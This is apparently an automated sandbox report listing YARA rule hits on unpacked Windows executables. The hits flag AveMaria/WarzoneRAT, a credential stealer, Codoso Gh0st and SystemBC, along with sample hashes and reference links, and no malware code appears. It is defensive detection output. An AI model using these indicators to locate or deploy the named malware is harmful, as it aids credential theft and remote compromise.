Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 23.2.Kyvoykbd.PIF.123c4b88.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.pointer.com.123e5bb8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
